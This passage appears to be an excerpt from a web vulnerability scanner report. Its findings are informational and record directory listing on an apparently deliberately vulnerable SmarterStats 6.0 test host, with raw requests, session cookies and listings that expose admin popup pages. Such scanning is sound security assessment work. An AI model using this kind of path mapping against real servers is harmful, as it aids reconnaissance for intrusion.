Thursday, October 07, 2010 01:00 PM 136 <A href="GettingStartedHandler.ashx">GettingStartedHandler.ashx</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.4. http://vulnerable.smarterstats.6.0.host:9999/Admin/Popups/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/Popups/

Request

GET /Admin/Popups/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:19:19 GMT
Content-Length: 2466
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /Admin/Popups/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /Admin/Popups/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/Admin/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 1,367 <A href="frmActivate.aspx">frmActivate.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,416 <A href="frmEmailReport.aspx">frmEmailReport.aspx</A>
Thursday, October 07, 2010 01:00 PM 828 <A href="frmExportReport.aspx">frmExportReport.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,985 <A href="frmFtpFileBrowser.aspx">frmFtpFileBrowser.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,310 <A href="frmImpersonateUser.aspx">frmImpersonateUser.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,906 <A href="frmLogLocation.aspx">frmLogLocation.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,251 <A href="frmPopupIISSiteList.aspx">frmPopupIISSiteList.aspx</A>
Thursday, October 07, 2010 01:00 PM 657 <A href="frmPrintPreview.aspx">frmPrintPreview.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,958 <A href="frmRemoteFileBrowser.aspx">frmRemoteFileBrowser.aspx</A>
Thursday, October 07, 2010 01:00 PM 771 <A href="frmServerChange.aspx">frmServerChange.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,028 <A href="frmSitesDeleteLogs.aspx">frmSitesDeleteLogs.aspx</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.5. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/

Request

GET /App_Themes/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:52 GMT
Content-Length: 1432
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 29 <A href="AboutThisFolder.txt">AboutThisFolder.txt</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Default/">Default</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.6. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/

Request

GET /App_Themes/Default/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:00 GMT
Content-Length: 1984
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 206 <A href="ButtonBarIcons.xml">ButtonBarIcons.xml</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Controls/">Controls</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="CSS/">CSS</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Flash/">Flash</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Images/">Images</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Javascript/">Javascript</A>
Thursday, October 07, 2010 01:00 PM 217 <A href="Skin.xml">Skin.xml</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Sounds/">Sounds</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.7. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/CSS/

Request

GET /App_Themes/Default/CSS/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:11:32 GMT
Content-Length: 2636
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/CSS/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/">[To Parent Directory]</A>

Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="BrowserOverrides/">BrowserOverrides</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Error/">Error</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="FileDownload/">FileDownload</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="GettingStarted/">GettingStarted</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Internal/">Internal</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Login/">Login</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Mail/">Mail</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Main/">Main</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Popup/">Popup</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Portal/">Portal</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Print/">Print</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Reporting/">Reporting</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Stats/">Stats</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Track/">Track</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Wizard/">Wizard</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.8. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/BrowserOverrides/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/CSS/BrowserOverrides/

Request

GET /App_Themes/Default/CSS/BrowserOverrides/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:02 GMT
Content-Length: 1399
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/BrowserOverrides/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/CSS/BrowserOverrides/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 203 <A href="ie6.css">ie6.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.9. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Error/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/CSS/Error/

Request

GET /App_Themes/Default/CSS/Error/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:25 GMT
Content-Length: 1472
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Error/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/CSS/Error/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 67 <A href="Buttons.css">Buttons.css</A>
Thursday, October 07, 2010 01:00 PM 1,016 <A href="Error.css">Error.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.10. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/FileDownload/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/CSS/FileDownload/

Request

GET /App_Themes/Default/CSS/FileDownload/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:25 GMT
Content-Length: 1423
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/FileDownload/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/CSS/FileDownload/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 2,182 <A href="FileStorageDownload.css">FileStorageDownload.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.11. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/GettingStarted/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/CSS/GettingStarted/

Request

GET /App_Themes/Default/CSS/GettingStarted/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:25 GMT
Content-Length: 1417
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/GettingStarted/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/CSS/GettingStarted/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 684 <A href="GettingStarted.css">GettingStarted.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.12. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Internal/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/CSS/Internal/

Request

GET /App_Themes/Default/CSS/Internal/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:25 GMT
Content-Length: 1579
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Internal/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/CSS/Internal/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 272 <A href="FilterBar.css">FilterBar.css</A>
Thursday, October 07, 2010 01:00 PM 439 <A href="Intranet.css">Intranet.css</A>
Thursday, October 07, 2010 01:00 PM 950 <A href="Sidebar.css">Sidebar.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.13. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Login/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/CSS/Login/

Request

GET /App_Themes/Default/CSS/Login/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:25 GMT
Content-Length: 1472
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Login/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/CSS/Login/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 69 <A href="Buttons.css">Buttons.css</A>
Thursday, October 07, 2010 01:00 PM 1,304 <A href="Login.css">Login.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.14. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Mail/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/CSS/Mail/

Request

GET /App_Themes/Default/CSS/Mail/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:25 GMT
Content-Length: 1911
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Mail/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/CSS/Mail/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 7,877 <A href="Calendar.css">Calendar.css</A>
Thursday, October 07, 2010 01:00 PM 3,644 <A href="Compose.css">Compose.css</A>
Thursday, October 07, 2010 01:00 PM 319 <A href="Notes.css">Notes.css</A>
Thursday, October 07, 2010 01:00 PM 1,043 <A href="ReadMail.css">ReadMail.css</A>
Thursday, October 07, 2010 01:00 PM 368 <A href="RSS.css">RSS.css</A>
Thursday, October 07, 2010 01:00 PM 1,046 <A href="Sync.css">Sync.css</A>
Thursday, October 07, 2010 01:00 PM 1,860 <A href="Tasks.css">Tasks.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.15. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Main/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/CSS/Main/

Request

GET /App_Themes/Default/CSS/Main/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:25 GMT
Content-Length: 4651
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Main/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/CSS/Main/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 490 <A href="!Reset.css">!Reset.css</A>
Thursday, October 07, 2010 01:00 PM 230 <A href="ActionBar.css">ActionBar.css</A>
Thursday, October 07, 2010 01:00 PM 2,358 <A href="AdvancedSearch.css">AdvancedSearch.css</A>
Thursday, October 07, 2010 01:00 PM 707 <A href="Attachments.css">Attachments.css</A>
Thursday, October 07, 2010 01:00 PM 1,341 <A href="Buttons.css">Buttons.css</A>
Thursday, October 07, 2010 01:00 PM 519 <A href="Content.css">Content.css</A>
Thursday, October 07, 2010 01:00 PM 664 <A href="DragDrop.css">DragDrop.css</A>
Thursday, October 07, 2010 01:00 PM 2,930 <A href="FilterBar.css">FilterBar.css</A>
Thursday, October 07, 2010 01:00 PM 776 <A href="FlashFileUpload.css">FlashFileUpload.css</A>
Thursday, October 07, 2010 01:00 PM 256 <A href="Folders.css">Folders.css</A>
Thursday, October 07, 2010 01:00 PM 322 <A href="Footer.css">Footer.css</A>
Thursday, October 07, 2010 01:00 PM 532 <A href="Frame.css">Frame.css</A>
Thursday, October 07, 2010 01:00 PM 5,743 <A href="Grid.css">Grid.css</A>
